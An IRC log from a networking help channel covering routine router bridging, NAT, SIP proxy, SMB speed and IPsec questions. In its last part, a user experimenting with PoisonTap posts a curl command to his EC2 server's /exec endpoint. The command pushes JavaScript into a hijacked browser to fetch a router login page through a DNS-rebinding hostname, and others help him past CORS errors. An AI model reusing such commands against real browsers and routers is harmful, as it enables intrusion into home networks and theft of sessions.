11:14 <+catphish> you probably have a new MAC 11:14 <+catphish> the bridge may be using the wireless interface's MAC rather than the physical interface's MAC, you can probably change it 11:17 < wadadli> oh so the hotspot can't work that way it seems 11:17 <+catphish> it should do 11:18 <+catphish> it just needs to know that its WAN interface is now bridge-staff 11:18 < wadadli> oh? 11:19 < wadadli> so what about wlan1 being in bridge hotspot? 11:19 < linux_probe> shatspot, poot pooot 11:20 < Lightsword> I’m trying to query the mac address table of a switch using dot1dTpFdbAddress = 1.3.6.1.2.1.17.4.3.1.1 which was working on most switches I’ve tried but doesn’t seem to work on all, apparently there’s something called SNMP community string based indexing that I need to use if the switch has vlans, any idea how I’m supposed to query with that? 11:20 <+catphish> wadadli: yes wlan 1 should be in bridge hotspot 11:20 < wadadli> Now the router is in bridge mode. 11:20 < wadadli> Before it was in router mode 11:21 < wadadli> https://imgur.com/a/tb3Pa 11:26 < wadadli> catphish: ok, working. 11:27 < wadadli> Now I have wlan3 in bridge-guest 11:27 < wadadli> I take it I should be able to give these guys a different IP network. 11:28 <+catphish> yep 11:41 < wadadli> hrm for some reason clients on the Guest AP aren't getting an IP from the DHCP server although it's configured on the bridge-guest interface. 11:41 < wadadli> which has the guest-wlan3 virtual interface. 11:42 < wadadli> ah nvm forgot to assign the pool to the dhcp server 11:46 < wadadli> so guest are on 10.5.60.0/24 and have no access to the internet 11:47 <+catphish> you might need to check the NAT rules 11:47 <+catphish> it's hard to say what's wrong without seeing the full config 11:48 < wadadli> should their gateway be 10.5.60.1? 11:49 <+xand> if that's the router 11:50 < wadadli> Nope it isn't.
11:50 < wadadli> router is 192.168.1.2 11:50 <+xand> that's not a valid router for 10.5.60.0/24 11:50 <+catphish> their gateway should be on their subnet 11:51 <+catphish> ie the AP of your router-access-point thing on that interface 11:51 <+xand> the router should have an address inside 10.5.60.0/24 11:51 <+catphish> *IP 11:51 <+catphish> so the router / AP should have an IP like 10.5.60.1 11:51 <+catphish> and that should be the gateway 11:52 < wadadli> https://imgur.com/a/peFNl 11:52 < wadadli> Like this? 11:52 < wadadli> I have 10.5.60.1 on the bridge-guest 11:54 <+catphish> you have the same IP on 2 interfaces 11:54 <+catphish> you need to fix that 11:54 <+catphish> oh, no you don't 11:54 <+catphish> never mind 11:55 <+catphish> it seems a little muddled in the wifi interface naming 11:56 < wadadli> https://imgur.com/a/Edmu2 11:56 < wadadli> wlan1 is master 11:57 < wadadli> guest-wlan3 and staff-wlan2 are virtual 11:59 <+catphish> ok, makes sense 11:59 <+catphish> well it all looks good 12:04 < wadadli> hrm. 12:07 < wadadli> https://imgur.com/a/WyPV3 12:07 < wadadli> This is what I am getting 12:08 < hey2> hngh 12:08 < hey2> have a robot that is going around changing MACs to FFFFFFFFFFFF 12:08 < hey2> what happens when you have multiple devices with 0xFFFFFFFFFFFF 12:09 < hey2> does all the traffic just get broadcast everywhere and consume all the bandwidth? 12:10 <+catphish> wadadli: looks like the connection to the router is OK, you probably need to look at your NAT rules next 12:11 < wadadli> hrm 12:12 <+catphish> open up your firewall, look at the nat section 12:12 <+catphish> see what's there 12:12 < wadadli> ya here 12:13 < wadadli> do I need to masquerade the network? 12:14 < wadadli> this is what I see 12:14 < wadadli> https://imgur.com/a/dQIYU 12:14 <+catphish> yeah you need a masquerade 12:14 <+catphish> for the new network 12:16 < wadadli> did that no different 12:16 < wadadli> maybe need to reboot router? 12:16 < wadadli> or renew lease?
12:27 < wadadli> just can't make it out to the internet 12:27 < djph> ping the gateway? 12:28 < djph> *the router's gateway 12:28 < wadadli> while on the network? 12:30 < wadadli> I could do that but I'd have to force cmd to use that network. 12:31 < light> if you have to force it to use the right network then what makes you think your browser is using the right network? 12:32 < wadadli> Because I'm forcing the browser. 12:33 < light> why are you forcing stuff at all? 12:33 < wadadli> Because Windows. 12:33 < light> are you doing weird stuff? 12:33 < wadadli> Never the less, let's not worry over that aspect as it is entirely valid and not the issue here. 12:33 < light> what's the issue? 12:34 < wadadli> read up. 12:34 < light> no thanks 12:37 < djph> light: I believe "forcing the network" is now :) (although, if it's wlan0 vs. eth0 ... ehhhh) 12:40 < wadadli> maybe I should trying making the gateway for this network the gateway of the router. 12:40 < wadadli> instead of the network gateway 12:41 < light> I find a diagram always helps 12:42 < djph> light: s/a diagram/liquor/ 12:43 < wadadli> I guess the answer to how do you know it's using the right network is webrtc leaking in my favour? 12:43 < wadadli> oh yeah, that and hours of verification. 12:46 < wadadli> https://imgur.com/a/c0VuU 13:39 < funabashi> Hi anyone into Tufin Securetrack? 13:40 < djph> no 13:40 < djph> well, maybe "someone" is ... 13:46 < bezaban> sounds like a hobbit 13:50 < mAniAk-_1> funabashi: a bit 15:03 < funabashi> mAniAk-_1: do you maybe know if i can check arp tables on devices via the rest api? 15:23 < mAniAk-_1> no, not sure if it collects arp 15:58 < CuriosTiger> PanOS 8.1.0 breaks...software updates. 15:58 < CuriosTiger> That's kind of special. 17:01 < gtrmtx> how should i go about redirecting all sip requests to a different address? 17:03 < bn_work> ok, stupid question, but why is this https://www.google.com/search?q=1Gbit%2Fs%2F8&oq=1Gbit%2Fs%2F8 not giving me 125MBps? 
Is Google misparsing? 1Gbit/s / (8bit/byte) = 1 x 10^9 / 8 = 125 x 10^6 17:04 < shtrb|laptop> gtrmtx, have a proxy or rewite the requests 17:04 < shtrb|laptop> SIP + SDP 17:05 < gtrmtx> shtrb|laptop, i have a proxy set up in apache that seems to be redirecting the http requests 17:05 < gtrmtx> but according to tcpdump my sip requests on udp 5060 are not making it to the desired server 17:06 < shtrb|laptop> gtrmtx, I'm talking about SIP proxy (depend on your server application different approach can be done) you can also fork some of the messages (based on answering lag) or you could behave as a gateway 17:07 < shtrb|laptop> gtrmtx, when you say redirect do you mean you wish to behave like a B2BUA/UA/whatever or send and forget ? 17:08 < bn_work> it's giving "15.62500 MBps" instead, which seems wrong? 17:08 < gtrmtx> hmm, not sure. its for an install of freepbx and i dont know which i would need 17:08 < shtrb|laptop> gtrmtx, c.f. https://en.wikipedia.org/wiki/Back-to-back_user_agent#Call_flow_diagram 17:08 < gtrmtx> yeah im looking at that page already 17:08 < gtrmtx> give me a sec 17:09 < shtrb|laptop> gtrmtx, #freepbx could give you direct assitance as long as you express exactly what you wish to do 17:10 < gtrmtx> ive been in #freepbx quite a bit. they would tell me that i need to ask elsewhere, as my issue is with initiating communication with the server, and not the server itself 17:10 < shtrb|laptop> ok , does your freepbx is able to interact with the other side ? 17:10 < shtrb|laptop> the other side is a UAS or a UA ? 17:10 < gtrmtx> via http, yes 17:11 < gtrmtx> i can reach the pbx gui via http 17:11 < shtrb|laptop> That is not what I have asked 17:11 < gtrmtx> oh sorry 17:11 < gtrmtx> can you reword? i dont quite understand what youre asking 17:12 < gtrmtx> what do you mean by 'other side' 17:12 < gtrmtx> my endpoints? 
17:12 < djph> I believe he's asking if a "UAS" (whatever that is to freepbx) can talk to freepbx 17:12 < shtrb|laptop> UA@gtrmtx.home ---> freepbx ---> some XXX server 17:12 < shtrb|laptop> sorry , UAS - user agent server 17:12 < djph> or that ... 17:12 < shtrb|laptop> B2BUA - back to back User agent 17:13 < djph> phones suck :) 17:13 < shtrb|laptop> UA - user agent (client application like pjsip/yate/sipme whatever) 17:13 < gtrmtx> oh ok, so ua/uas basically means extension endpoints? 17:13 < ||cw> bn_work: that's pretty weird 17:14 < TandyUK> its a proxy in any other language 17:14 < shtrb|laptop> djph, networking sucks we should come back to smoke signals ! 17:14 < djph> shtrb|laptop: way ahead of you ... have RFC#(????) prepared for IPoSS 17:14 < gtrmtx> shtrb|laptop, my client applications are not able to interact with freepbx 17:14 < shtrb|laptop> IP over avian rocks ! 17:15 < shtrb|laptop> gtrmtx, now you are talking ! 17:15 < bn_work> ||cw: am I going nuts? is Google, a company with some of the most brilliant minds getting basic unit conversion wrong? 17:15 * gtrmtx just has to learn the language 17:15 < gtrmtx> :) 17:15 < shtrb|laptop> gtrmtx, do both client are register to freepbx 17:15 < djph> shtrb|laptop: no no, that's IPoACo (IP Over Avian Coconut) 17:15 < shtrb|laptop> which language ? 17:15 < gtrmtx> the terminology that you are using 17:15 < Apachez> Internet Protocol over Asian Companies 17:15 < gtrmtx> neither client is able to register with the pbx 17:16 < shtrb|laptop> gtrmtx, did you setup register on freepbx ? 17:16 < ||cw> bn_work: yeah something is parsing odd. this one works "1 gbit/s in mbyte/s" 17:16 < gtrmtx> yes 17:16 < gtrmtx> hold on though 17:16 < gtrmtx> im typing out my setup 17:16 < shtrb|laptop> RFC2549 ! 17:17 < shtrb|laptop> Apachez, are Asian Companies deliver more cat pics per second ? 17:17 < bn_work> ||cw: yeah, I eventually found that too, but I was like "??.... that doesn't seem right" :/ 17:17 < bn_work> sigh...
17:18 < shtrb|laptop> c/s (Cat (mammal ) picture per second ) is the only true network metric ! 17:18 < gtrmtx> mydomain.com is an ubuntu 16.04 server with webspace site1(my website), and it has an internal address of x.x.x.1. also installed on this server is a qemu vm of the freepbx, with internal address of x.x.x.2 17:18 < gtrmtx> pbx.mydomain.com is routing http requests to site2 without any issue 17:18 < gtrmtx> using proxypass and proxypassreverse 17:18 < gtrmtx> however 17:18 < shtrb|laptop> gtrmtx, who says that x.x.x.1 can really interact with x.x.x.2 ? 17:19 < gtrmtx> they are already interacting via http successfully 17:19 < shtrb|laptop> how are they interconnected ? routing ? vpn ? 17:19 < shtrb|laptop> missed about proxypass/proxypassreverse 17:19 < gtrmtx> yeah 17:20 < gtrmtx> so pp/ppr are set up on x.x.x.1 17:20 < gtrmtx> and sending http to x.x.x.2 without a problem 17:20 < gtrmtx> but my sip requests are not appearing to follow the same rules 17:20 < shtrb|laptop> Can you remove apache proxying out of the loop to avoid problems ? 17:20 < shtrb|laptop> SIP != HTTP 17:20 < gtrmtx> right 17:20 < TandyUK> what are you suing to proxy the sip requests? 17:20 < TandyUK> using* 17:21 < TandyUK> and RTP for that matter 17:21 < gtrmtx> well, i tried editing my hosts file 17:21 < gtrmtx> but that didnt work 17:21 < TandyUK> what program 17:21 < TandyUK> apache doesnt do SIP/RTP 17:21 < shtrb|laptop> TandyUK, he used apache 17:21 < TandyUK> apache speak http/https 17:21 < gtrmtx> i guess im honestly in this room to ask what best practice is 17:21 < gtrmtx> im not in here saying i had it working 17:21 < gtrmtx> more like i want to make it work 17:21 < TandyUK> im asking yo ua question 17:21 < shtrb|laptop> I think that setuping up vpn or routing will be the best option for you 17:21 < TandyUK> what program, on the x.x.x.1 host, are you using to do this proxying 17:22 < gtrmtx> for sip, nothing. 
im asking what i should use 17:22 < gtrmtx> for http, apache 17:22 < TandyUK> nothing, you shouldnt proxy it imho 17:22 < TandyUK> if you do, expect issues 17:22 < gtrmtx> ...its not working at all though 17:22 < TandyUK> sip and proxies do NOT play nicely 17:22 < shtrb|laptop> Because otherwise you need to add a VIA , rewirte the IP part and SDP 17:23 < shtrb|laptop> TandyUK, SIP and proxy works ok if you know what you do (RTP is the one that doesn't like NAT) 17:23 < TandyUK> hmm with significant fiddling, it can work, but its far from reliable 17:23 < TandyUK> (this is coming from a VOIP provider) :P 17:23 < gtrmtx> what route would i take though? 17:23 < gtrmtx> is this a dns thing? 17:23 < shtrb|laptop> How hard it to setup STUN ?! 17:23 < gtrmtx> or what? 17:23 < shtrb|laptop> no 17:24 < shtrb|laptop> TandyUK, I guess your sample is just bigger than mine 17:24 < gtrmtx> not a dns thing? 17:24 < TandyUK> STUN doesnt help wit hthe mangling of packets 17:24 < TandyUK> sure we get the irght WAN ip 17:24 < TandyUK> and as soon as you introduce SIP/TLS, have fun with that :P 17:25 < shtrb|laptop> it will avoid SDP rewrite needs , and a decent sip router should do other magic 17:25 < gtrmtx> there is no router that i have access to 17:25 < gtrmtx> this is all on a digitalocean droplet 17:25 < shtrb|laptop> Can I start a Kamailio vs Opensips flame war ? 17:25 < shtrb|laptop> sip-router is an application 17:26 < gtrmtx> oh 17:26 < shtrb|laptop> OpenSer is the only true SIP service provider ! 17:26 < gtrmtx> is that something that could work for me? 17:26 < TandyUK> [16:21] what program, on the x.x.x.1 host, are you using to do this proxying << Kamailio would have been a suitable answer to this 17:27 < TandyUK> or perhaps opensips, but i dont use that 17:27 < gtrmtx> so you set it up on x.x.x.1, and it acts as a transparent middle man? 
17:28 < TandyUK> and to be clear, im saying proxying sip, client side, eg with a sip 'helper' on the client end firewall, is the bad thing 17:28 < TandyUK> aka ALG 17:28 < shtrb|laptop> TandyUK, that is like sending a Tomahawak to handle get rid a raccoon 17:28 < TandyUK> if your provider end is setu pcorrectly, it should be totally unnecesary 17:28 < shtrb|laptop> gtrmtx, first please join the machines via routing / vpn what suite you more 17:29 < gtrmtx> TandyUK, but using a sip router is ok? 17:29 < shtrb|laptop> then you can choose your sip option 17:29 < gtrmtx> shtrb|laptop, what do you mean? 17:29 < gtrmtx> they are all on the same subnet 17:29 < gtrmtx> i dont know what more you are getting at 17:29 < shtrb|laptop> gtrmtx, if you need a proxy that mean they are not connected 17:30 < TandyUK> wait wait.... x.x.x.1 and x.x.x.2 are *public* ips right? 17:30 < shtrb|laptop> no! 17:30 < gtrmtx> no theyre private 17:31 < TandyUK> so you have to have some sort of NAT going on 17:31 < shtrb|laptop> that is why I ask nuke the proxy and connect them (routing or vpn or bind the networks) 17:31 < TandyUK> or proxy, or whatever 17:31 < TandyUK> for clients out in the world to connect 17:31 < shtrb|laptop> or all client must join his VPN / Network 17:31 < TandyUK> if x.x.x.1 and x.x.x.2 cant communicate directly, with NO assistance, your network is fubar 17:32 < shtrb|laptop> :D 17:32 < shtrb|laptop> TandyUK, what's your take on WebRTC to SIP gateways ? 17:32 < gtrmtx> TandyUK, shtrb|laptop , x.x.x.1 = actual internal address of server. x.x.x.2 = assigned internal address of virtualized server running on the physical machine with address x.x.x.1 17:32 < TandyUK> stop swearing 17:32 < shtrb|laptop> TandyUK, sorry what ? 17:32 < TandyUK> TandyUK, what's your take on WebRTC to SIP gateways ? 
17:32 < TandyUK> ^^ 17:33 < shtrb|laptop> lol 17:33 < gtrmtx> TandyUK, x.x.x.1 and x.x.x.2 can communicate with each other without any proxying 17:33 < shtrb|laptop> gtrmtx, so why did you plugged a proxy in between ? 17:34 < gtrmtx> because x.x.x.1 is where all public requests go first, and the pbx is on x.x.x.2 17:34 < shtrb|laptop> is x.x.x.1 some kind of firewall/ load balancer machine ? 17:35 < gtrmtx> nope 17:35 < TandyUK> how do they get to x.x.x.1 using that ip? 17:35 < TandyUK> x.x.x.1 is his host, x.x.x.2 is a vm on it 17:36 < gtrmtx> yes 17:36 < TandyUK> the host must have some different IP for WAN 17:36 < gtrmtx> mydomain.com > public ip > x.x.x.1 17:37 < shtrb|laptop> gtrmtx, do you have something like 172.168.1.1 on host and 192.168.1.2 on guest ? 17:37 < shtrb|laptop> (if 172.16.1.1 would be public ip routable ip) 17:37 < gtrmtx> 192.168.122.1 and 192.168.122.36 are the actual addresses 17:37 < gtrmtx> .36 assigned via dhcp 17:37 < bn_work> so I don't get it, I have a server connected at 1Gb/s ethernet to a Linksys RVS4000 router that is connected to a 8-port Netgear GS108 switch at 1Gb/s which is connected to an ioMega StorCenter ix2 NAS at 1Gb/s, yet an SMB file transfer is going at like ~7MB/s, no other users, what gives? 17:37 < TandyUK> dhcp on a server.. seriously 17:37 < gtrmtx> but for simplicity, x.x.x.1 and x.x.x.2 17:38 < TandyUK> do yourself a massive favour right now and go set its ip statically 17:38 < gtrmtx> TandyUK, adminned by digitialocean, not me 17:38 < TandyUK> or youre in a world of pain when the lease expires 17:38 < shtrb|laptop> ok, but 192.168.122.1 has another ip (public ) ? 17:38 < gtrmtx> yes 17:38 < TandyUK> your Guest VM is adminned by DO? 17:38 < grawity> bn_work: what SMB server software, what SMB client software, what protocol version in between, have you tested non-SMB transfers? 
17:38 < gtrmtx> TandyUK, no 17:38 < TandyUK> do yourself a massive favour right now and go set its ip statically 17:38 < TandyUK> or youre in a world of pain when the lease expires 17:38 < gtrmtx> i can do that 17:39 < gtrmtx> but will sip router be adequate to reroute sip requests in this configuration? 17:39 < bn_work> actually, I take that back... s/server/i7 3GHz + 16GB RAM + W7 Pro x64/ 17:39 < shtrb|laptop> sip-router (not ALG) is a carrier grade solution - so yes 17:39 < gtrmtx> ok cool 17:40 < bn_work> grawity: SMB is whatever iOMega is using under the hood, client side is W7 x64 OS's native client, how could I check protocol version? 17:40 < shtrb|laptop> wireshark 17:40 < bn_work> (I belive ioMega is using a modified Linux OS, no?) 17:42 < ||cw> bn_work: IX2 has a Marvell 1 GHz cpu, it's crap. that's all you'll get for samba because samba is CPU heavy 17:43 < ||cw> FTP will be pretty fast, sftp faster than samba but not by much 17:44 < shtrb|laptop> Using FTP is asking to be hacked 17:44 < ||cw> well, if it's just a home LAN.... 17:45 < ||cw> but anyway, it's just to show the network is fine 17:45 < ||cw> no one wants to use ftp for a lcoal NAS 17:45 < grawity> what makes samba "cpu heavy" 17:46 < ||cw> the CIFS protocol 17:46 < ||cw> it's a combo of the marvel cpu being extra crappy and the small amount of ram 17:46 < gtrmtx> TandyUK, what do i need to set in kamailio to route sip traffic to x.x.x.2? 17:47 < djph> grawity: MS garbage code on top of MS garbage FS? 
17:47 < grawity> djph: maybe in some alternate reality where samba runs on windows/ntfs 17:48 < grawity> if the CIFS protocol is the problem, see if the NAS vendor has a firmware upgrade with SMB2/SMB3 support 17:48 < shtrb|laptop> djph, samaba (the software) normally is setup over non Win machines :) 17:48 < grawity> both for performance improvements, and because MS themselves are dropping CIFS 17:48 < ||cw> grawity: it's not heavy on desktop class CPU, but it's extra heavy on the marvel because it's an old embedded CPU with gigE patched on it to sell cheap NASs 17:49 < grawity> I doubt SFTP with crypto on top would be less heavy 17:49 < shtrb|laptop> in that case use WEBDAV[s] or better sftp (less traffic and much faster if you enable compression ) 17:49 < shtrb|laptop> grawity, SFTP is less chatty that SMB/CIFS 17:49 < djph> grawity: oh, mistook it as (MS) SMB running on a winbox 17:50 < grawity> shtrb|laptop: another reason to see if there's SMB2 support, imo 17:50 < ||cw> I havea similar class synology NAS with a slightly better CPU, i rarely get better than 20MB/s via samba, and that's with SMB3 support 17:51 < ||cw> my previous nas had a marvel and 128MB ram, that was a performance killer 17:52 < shtrb|laptop> wasn't SMB2 disabled by default today ? 
(with SMBv1 ) 17:52 < ||cw> might be 17:53 < shtrb|laptop> just checked with Win10 SMBv2 is disabled by default 17:54 < grawity> how did you check 17:55 < grawity> all Win10 systems I've seen, SMBv2/3 is on by default, SMBv1 also used to be on, new installs have an "autodetector" thingy that keeps stats and eventually disables v1 17:55 < grawity> djph: speaking of alternate reality, have you seen the latest opensource app from MS 17:56 < shtrb|laptop> I have a clean win10 installation ( and https://support.microsoft.com/en-us/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and ) but 1 was enabled 17:56 < grawity> yeah, 1 will be enabled at first, and magically disappear after a few weeks if the service counts no usages 17:56 < shtrb|laptop> or untill I will get an update !@$!@ 17:57 < Demos[m]> doesn't samba default to smb1 connections until recently 17:57 < djph> grawity: errr 17:57 < shtrb|laptop> grawity, are the extra features that go disabled after time ? 17:58 < grawity> shtrb|laptop: ? 17:58 < ||cw> Demos[m]: depends on the build options 17:58 < shtrb|laptop> grawity, you said it will magically disappear , so I ask if there other things that should stop working (what hell to expect ) 17:58 < grawity> no, just smbv1 17:59 < Demos[m]> well I mean for most distros 17:59 < shtrb|laptop> grawity, thanks 18:05 < Simeri> ping 8.8.8.8 18:06 < skyroveRR> ping Simeri 18:06 < Simeri> sorry having trouble with my chat window 18:06 < skyroveRR> Yeah me too 18:22 < Orbixx> Is there a way I can temporarily relieve bad latency on a route by putting a server in between the source and destination that has good latency to both source and destination? 18:23 < shtrb|laptop> You mean to interfere with the next hop ? 
18:24 < ||cw> assuming that adding up the 2 "good" latencies and adding in the forwarding relay latency is less than "bad" latency, sure 18:24 < ||cw> shtrb|laptop: I was assuming more like a proxy 18:25 < shtrb|laptop> sorry was thinking about some kind of least cost routing or other approach 18:25 < Orbixx> shtrb, yes 18:26 < ||cw> bouncing off a server isn't exactly routing though 18:26 < shtrb|laptop> I thought about avoiding it (if you control the path ) 18:26 < Orbixx> No, quite 18:28 < Orbixx> I only have control of the source and all the equipment behind it, I don't control any parts of the path or the destination 18:28 < Orbixx> The NOC might take a while to resolve the absurdly long route they're taking, so I want to figure out something to temporarily improve the route 18:28 < Orbixx> It doesn't have to be perfect, as it will be ripped out again once the route is fixed 18:29 < shtrb|laptop> Orbixx, setup a ppp connection after the bad server , and route all trafic over that ppp 18:34 < shtrb|laptop> Which is like ||cw suggested (a "proxy") 18:35 < shtrb|laptop> gtrmtx, sip-router.org , opensips.org , kamailio.org 18:35 < gtrmtx> shtrb|laptop, following this right now: https://medium.com/southbridge-io/kamailio-sip-proxy-installation-and-minimal-configuration-example-c96b5729853a 18:37 < shtrb|laptop> I think that config and version is slightly old ... (centos 6.8 ) 18:50 < IamTrying> I need to setup IPSec Pre-shared connection from my CentOS. Network administrator of my client asked me two complicated question, felt like my tooth will fall out to answer them. 18:50 < IamTrying> 1) Phase 2 DH settings? 2) local encryption domain 18:50 < IamTrying> What is it? 18:53 < djph> 1. the IKE phase 2 diffie-hellman settings. 2. a.b.c.d/24 18:53 < djph> 3. you should probably brush up your CV 18:54 < djph> (3. 
only if your dayjob is networking) 18:54 < shtrb|laptop> DH settings - Diffie-Hellman groups (you need to give info about your IKE phases ) 18:55 < shtrb|laptop> IamTrying, Check shrew or racoon if you wish to jump into deep water 18:55 < IamTrying> djph: DHG = is none , that is host a.b.c.d/24 is it left or right? in my CentOS i have left domain and right domain 18:55 < jamesc> please bear with me, I am doing some security research on my home network: I have a publicly accessible aws server, a program that generates thousands of iframes to different urls and force caches the urls in the browser, generates an outbound web socket to this server, from the server I issue a command to make the browser open a url, but I get a CORS error in the dev tools console like this https://pastebin.com/Hw8FSS35 18:56 < IamTrying> djph: not networking guru, but 10 years ago i did IPSec once and never did not like daily job. 18:56 < IamTrying> shtrb|laptop: IKE phases? is it not AES128 MD5? 18:57 < jamesc> i think i am getting a little lost on what exactly is happening, I can answer any questions on my setup, but would really appreciate some help following all this along 18:57 < djph> jamesc: err, what? 18:57 < grawity> I'd strongly suggest avoiding racoon 18:57 < jamesc> what's up 18:57 < IamTrying> Select one Diffie-Hellman group (1, 2, 5, or 14 through 21). The remote peer or dialup client must be configured to use the same group. 18:58 < IamTrying> But but but DHG i dont need? 18:58 < shtrb|laptop> grawity, I suggested that and shrew because it let you feel everything 18:58 < grawity> feel the mold 18:59 < IamTrying> djph: a.b.c.d/24 that i have to choose is it left or right? In my StrongSWAN left and right subnet i need to define. 19:00 < IamTrying> My client gave me his encryption domain as: x.y.x.y/24 should i use it in my config as left or right?
19:00 < grawity> one side is your local system, other side is the remote system 19:00 < grawity> traditionally left is yours, right is remote 19:00 < grawity> but strongswan does not care much really 19:01 < jamesc> djph what exactly was confusing i can clear it up 19:02 < djph> jamesc: missed it in hte scrollback 19:02 < jamesc> ok 19:02 < jamesc> so in that pastebin, you can see the CORS error 19:03 < IamTrying> OK - grawity, thank you. 19:03 < jamesc> but when I try to load the requested resource manually 19:03 < jamesc> i never get that error 19:03 < shtrb|laptop> jamesc, Are you the one behind pwnet ?! 19:03 < shtrb|laptop> *pwnat 19:03 < jamesc> ie i navigate to "http://192.168.0.1.ip.samy.pl/login" and it loads "http://buckeye-lab.smartrg.com/prime-home/control-panel/login?device=1XX" 19:03 < grawity> fairly sure samy's name is samy and not james 19:03 < jamesc> no 19:04 < shtrb|laptop> oh 19:04 < jamesc> yeah 19:04 < shtrb|laptop> because samy.pl is THE Samy 19:04 < jamesc> im just messing with poisontap on my home network 19:04 < grawity> but anyway, the error is ... literally how CORS works 19:05 < grawity> if site A wants to touch site B in some way, then site B needs to allow it via a special HTTP header 19:05 < shtrb|laptop> jamesc, you shall not mix stuff 19:05 < jamesc> ok 19:05 < grawity> unless site A completely opts out of things like sending credentials 19:05 < ||cw> jamesc: loads how 19:07 < jamesc> but why can i load the page from a different tab 19:07 < ||cw> jamesc: because "loads how" is important here. opening in a new tab is a new context, CORS doesn't apply 19:08 < jamesc> i have one tab open that the server has access to, and i execute a command to load "http://192.168.0.1.ip.samy.pl/login" it gets the CORS error 19:08 < jamesc> ok 19:08 < jamesc> loads with 19:08 < ||cw> "execute a command to load " means what, exactly? 
19:08 < jamesc> a curl command from the server 19:08 < shtrb|laptop> jamesc, ajax and others are normally blocked by default 19:09 < jamesc> the tab open in chrom has a websocket open to the server 19:09 < jamesc> from the server, I issue a curl command to get "http://192.168.0.1.ip.samy.pl/login" 19:10 < jamesc> the same get request i.e a new tab with "http://192.168.0.1.ip.samy.pl/login" succeeds 19:10 < jamesc> what is the difference between the two? 19:10 < ||cw> and what does the curl command do? 19:11 < ||cw> what does the web socket do with that? 19:11 < jamesc> curl 'http://ec2-18-188-133-5.us-east-2.ute.amazonaws.com:1337/exec?$.get("http://192.168.0.1.ip.samy.pl/login",functaion(d)\{console.log(d)\})' 19:11 < shtrb|laptop> your browser does CORL check before it open stuff 19:11 < shtrb|laptop> you are missing some headers there ... 19:12 < ||cw> are you having curl return the buckeye page content through the websocket and then trying to render that in a div? 19:12 < shtrb|laptop> curl -H 'Origin: blabla' ... 19:13 < jamesc> the curl command executes the get request from the browser 19:14 < jamesc> it doesn't go through the websocket i dont think 19:14 < ||cw> and the curl command is giving the CORS message? 19:14 < shtrb|laptop> You are missing the headers , in your broweser open the network messages (or wireshark) and see exactly what is sent 19:14 < jamesc> the browser is 19:14 < jamesc> ok shtrb|laptop i will 19:15 < ||cw> how does the browser get it? 
19:15 < shtrb|laptop> You need Origin + Access-Control-Request-Method and Access-Control-Request-Header 19:15 < shtrb|laptop> ||cw, there is an RFC for that 19:16 < ||cw> shtrb|laptop: you also need the target to be configured to respond saying that origin is allowed 19:16 < shtrb|laptop> RFC 6454 19:16 < shtrb|laptop> ||cw, that's the whole point :) 19:16 < ||cw> which I'm guessing isn't going to happen 19:17 < ||cw> so then the point is, what exactly is going on, and can the desired result be achieved without needing CORS 19:17 < shtrb|laptop> just fire up the correct headers ? 19:17 < ||cw> or use a different method? 19:18 < ||cw> but so far, i don't even know if its curl or the browser giving the CORS error, or why 19:18 < ||cw> nothing described so far implies CORS in any way 19:18 < shtrb|laptop> jamesc, just setup SSLKEYLOGFILE and wireshark to understand what is going on 19:18 < ||cw> a curl with a redirect does not need CORS 19:19 < grawity> ||cw: 1) "a program that generates thousands of iframes" 2) "generates an outbound web socket to this server, from the server I issue a command to make the browser open a url" 19:19 < ||cw> and "a command to load" can be 100 different things, from location.href to jquery.load() 19:20 < grawity> the exact command is not important, all of them do the same checks 19:20 < grawity> point is, site 1 inside an iframe is trying to navigate to site 2 19:22 < jamesc> yeah 19:22 < jamesc> so since it is from the browser, why is it engaging CORS? 19:22 < grawity> that's exactly why 19:23 < grawity> it's not from the browser *itself*, it's from site 1 (which is receiving those commands via websocket) 19:24 < jamesc> but the ajax request is originating from the browser 19:24 < jamesc> ultimately 19:24 < ||cw> loading an external site in an iframe doens't need cors either 19:24 < jamesc> the browser is making the get request 19:24 < ||cw> I just tested. 19:24 < grawity> jamesc: why do you think that's the important part? 
19:24 < jamesc> im not sure im just trying to understand
19:25 < ||cw> jamesc: what ajax request?
19:25 < grawity> ||cw: combining that with JS does
19:25 < grawity> ||cw: e.g. if the outer page tries to navigate an iframe using JS
19:25 < grawity> jamesc: it's the browser itself that performs this blocking, too
19:25 < jamesc> if i make the same request in a different tab, it doesn't engage cors, but getting the command from the websocket to the browser does
19:25 < grawity> jamesc: cors is engaged *by* the browser, not by the server
19:26 < grawity> the browser sees that the request is initiated by JS, and asks the server "hey is site 1 allowed to use you", and if not, then blocks the request
19:27 < ||cw> document.all("myiframe").src =... does not use CORS either
19:27 < ||cw> $("myiframe").load(..) might
19:27 < shtrb|laptop> why poisontap looks cool
19:27 < shtrb|laptop> *wow
19:28 < ||cw> jamesc: what exactly are you getting back over the websocket?
19:28 < ||cw> the page's HTML content?
19:28 < jamesc> so the server is rendering these sites
19:29 < jamesc> no
19:29 < ||cw> curl doesn't render, it just returns content
19:29 < shtrb|laptop> that tool allow taking over all cookies and CDN shit
19:29 < jamesc> the websocket just issues commands
19:29 < jamesc> i just can't visualize this at all
19:30 < grawity> so start at step 1
19:30 < grawity> what do those commands look like? literally
19:30 < ||cw> jamesc: have you tried asking support for the tool you're using?
19:30 < grawity> step 2: what does the JS code look like which handles those commands
19:31 < djph> grawity: "bad" :D
19:32 < jamesc> this is the command: "curl 'http://ec2-18-188-133-5.us-east-2.ute.amazonaws.com:1337/exec?$.get("http://192.168.0.1.ip.samy.pl/login",functaion(d)\{console.log(d)\})'" now I am going to look at "function(d)"
19:32 < grawity> is that a command you run in a terminal, or a command you receive via websocket?
19:32 < jamesc> i issue it from the aws instance
19:33 < jamesc> the browser gets it
19:33 < jamesc> so both
19:33 < grawity> i'm 100% sure the browser is not getting that exact same command
19:34 < mervin> hey guys
19:34 < jamesc> what is it getting, or what is it turning it into?
19:34 < grawity> how should I know, it's on your computer and you're the one with Developer Tools available
19:34 < grawity> but I would *guess* that the script at /exec just forwards '$.get("http://192.168.0.1.ip.samy.pl/login",functaion(d)\{console.log(d)\})' or something similar
19:34 < shtrb|laptop> grawity, I said it several times , you check what the browser does (you can use SSLKEYLOGFILE )
19:35 < grawity> you can press damn F12
19:35 < shtrb|laptop> sorry it was for jamesc
19:38 < jamesc> https://pastebin.com/dWXknCaH
19:41 < grawity> jamesc: that doesn't look like anything that was asked for
19:42 < jamesc> im not sure what SSLKEYLOGFILE
19:42 < jamesc> this is from dev tools
19:42 < grawity> but that's not websocket data, is it?
19:43 < grawity> if it's Chrome, clicking "WS" would filter websockets only, and each would have a tab with data
